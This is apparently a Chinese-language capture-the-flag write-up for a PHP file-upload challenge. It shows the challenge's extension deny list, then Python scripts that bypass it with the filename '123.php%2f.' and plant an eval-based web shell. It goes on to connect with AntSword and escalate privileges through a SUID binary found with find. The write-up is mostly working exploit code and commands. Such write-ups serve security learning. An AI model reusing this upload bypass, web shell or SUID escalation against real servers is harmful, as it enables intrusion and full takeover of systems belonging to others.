<?php

function blacklist($file){
  $deny_ext = array("php","php5","php4","php3","php2","php1","html","htm","phtml","pht","pHp","pHp5","pHp4","pHp3","pHp2","pHp1","Html","Htm","pHtml","jsp","jspa","jspx","jsw","jsv","jspf","jtml","jSp","jSpx","jSpa","jSw","jSv","jSpf","jHtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","aSp","aSpx","aSa","aSax","aScx","aShx","aSmx","cEr","sWf","swf","ini");
  $ext = pathinfo($file, PATHINFO_EXTENSION);
  foreach ($deny_ext as $value) {
    if (stristr($ext, $value)){
      return false;
    }
  }
  return true;
}

if(isset($_FILES['file'])){
  $filename = urldecode($_FILES['file']['name']);
  $filecontent = file_get_contents($_FILES['file']['tmp_name']);
  if(blacklist($filename)){
    file_put_contents($filename, $filecontent);
    echo "Success!!!";
  } else {
    echo "Hacker!!!";
  }
} else{
  highlight_file(__FILE__);
}

代码功能分析

• 黑名单机制：blacklist 函数通过检查文件扩展名是否在 $deny_ext 数组中，阻止上传常见可执行文件（如 .php, .jsp, .asp 等）。
• 文件上传逻辑：
  1. 接收用户上传的文件。
  2. 解码文件名（urldecode）。
  3. 检查扩展名是否在黑名单中。
  4. 如果通过检查，将文件保存到服务器。

使用pycharm上传文件

import requests

url = "http://node6.anna.nssctf.cn:22921/"
file = {
    "file":("123.php%2f.",open('1.php','r'))
}
res = requests.post(url=url,files=file).text
print(res)

或

import requests

url = "http://node6.anna.nssctf.cn:22921/"
file_content = "<?php eval($_POST[0]);phpinfo();?>"
file = {
    "file": ("123.php%2f.", file_content)
}
res = requests.post(url=url, files=file).text
print(res)

当上传123.php/.的时候，file_put_contents函数会认为是要在123.php文件所在的目录下创建一个名为.的文件，最终上传创建的是123.php

蚁剑链接，打开终端发现权限不足，使用插件绕过，再

find / -user root -perm -4000 -print

找到suid权限文件/usr/local/s3cRetTt

提权./s3cRetTt cat /flag